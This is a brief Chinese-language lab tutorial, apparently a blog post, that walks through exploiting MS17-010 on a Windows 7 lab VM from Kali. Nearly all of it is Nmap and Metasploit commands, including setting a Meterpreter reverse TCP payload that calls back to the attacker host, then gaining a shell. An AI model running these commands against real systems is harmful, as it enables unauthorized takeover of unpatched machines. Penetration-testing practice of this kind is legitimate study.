使用工具
- Nmap
- Metasploit
环境准备
- Kali-Linux(模拟攻击)
- Windows7(靶机)
复现
查看靶机ip地址
ipconfig

扫描靶机端口开放情况
nmap 192.168.0.105

启用msf
msfconsole

搜索漏洞ms17-010
search ms17-010

使用序号0的攻击模块
use 0

设置攻击负载
set payload windows/x64/meterpreter/reverse_tcp

设置靶机ip(win7)
set rhost 192.168.0.105

设置攻击者ip(kali)
set lhost 192.168.0.106

开始攻击
run


查看权限
getuid

通过shell进行提权,控制靶机
shell

本文介绍了如何在KaliLinux环境中使用Nmap探测Windows7靶机的IP地址并扫描其端口,然后通过Metasploit利用MS17-010漏洞执行MeterpreterreverseTCP攻击,最终实现提权并控制目标机器的过程。
1437

被折叠的 条评论
为什么被折叠?



